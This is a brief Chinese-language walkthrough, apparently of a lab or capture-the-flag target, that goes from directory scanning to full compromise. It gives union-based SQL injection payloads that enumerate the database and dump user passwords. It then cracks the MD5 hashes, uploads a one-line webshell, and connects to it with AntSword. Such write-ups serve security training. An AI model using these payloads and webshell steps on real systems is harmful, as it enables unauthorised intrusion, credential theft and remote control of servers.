1.目录扫描
我们先扫描一下目录 看到有四个目录 分别点进去看下
发现有一个登录界面一个注册界面 我们注册一个账户 登录看看
2.SQL注入
登录后发现有搜索框 可以搜索书名 我们尝试 SQL注入测试 主要搜索框要求搜索书名
经过简单的逻辑测试 发现确实存在SQL注入漏洞
接下来就是sql注入的一系列 order by 判断字段数是三个 利用联合查询 union 判断回显位置
查询当前数据库
-1' union select database(),2,3#
查看webapphacking库所有的表
-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#
查看users表中所有的列
-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#
查看表中user,password字段数据
-1' union select group_concat(user),group_concat(pasword),3 from users#
然后进行MD5解密
3.文件上传漏洞
使用superadmin用户登录 密码:Uncrackable
发现可以上传文件
提示我们上传成功
来到上传文档 发现一句话木马文件已经存在了
4.远程连接
去访问我们的木马文件让其运行成功后 拿中国蚁剑链接成功